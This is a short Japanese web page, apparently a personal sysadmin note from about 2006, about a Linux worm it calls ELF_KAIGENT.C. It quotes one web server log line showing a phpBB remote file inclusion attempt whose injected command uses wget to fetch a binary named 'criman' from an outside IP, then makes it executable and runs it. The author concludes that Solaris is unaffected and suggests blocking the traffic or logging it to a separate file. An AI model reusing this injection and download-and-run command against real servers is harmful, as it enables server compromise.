Go to TOP Page
Google:


□ELF_KAIGENT.C


○まずは、log の一例から

複数行に見えてると思うけれど、一行でってことで。

log を抜粋
221.25.90.6 - - [02/Oct/2006:02:10:22 +0900] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php? phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman; ./criman;echo%20YYY;echo| HTTP/1.1" 404 251 "-" "Mozilla/4.0 (compatible;MSIE 6.0; Windows NT 5.1;)"

カイジェントと呼ばれる worm のようで、 Linux に感染するそうな。
詳しくは、トレンドマイクロの

ELF_KAIGENT.C

アタリを見てくらさい。
取りあえず、 Solaris には関係ナシってことで。


□対処方法


○無視でおっけぇ

Solaris には感染しそうにないので、これとゆった対処はないようです。
通信を拒否るか、 ログがウザかったらログを別ファイルに書き出すか・・・
くらいしかないですかね?




go back    next
Copyright(c) ORATORIO-TANGRAM.com 2001-2007 All Rights Reserved.
Total:counter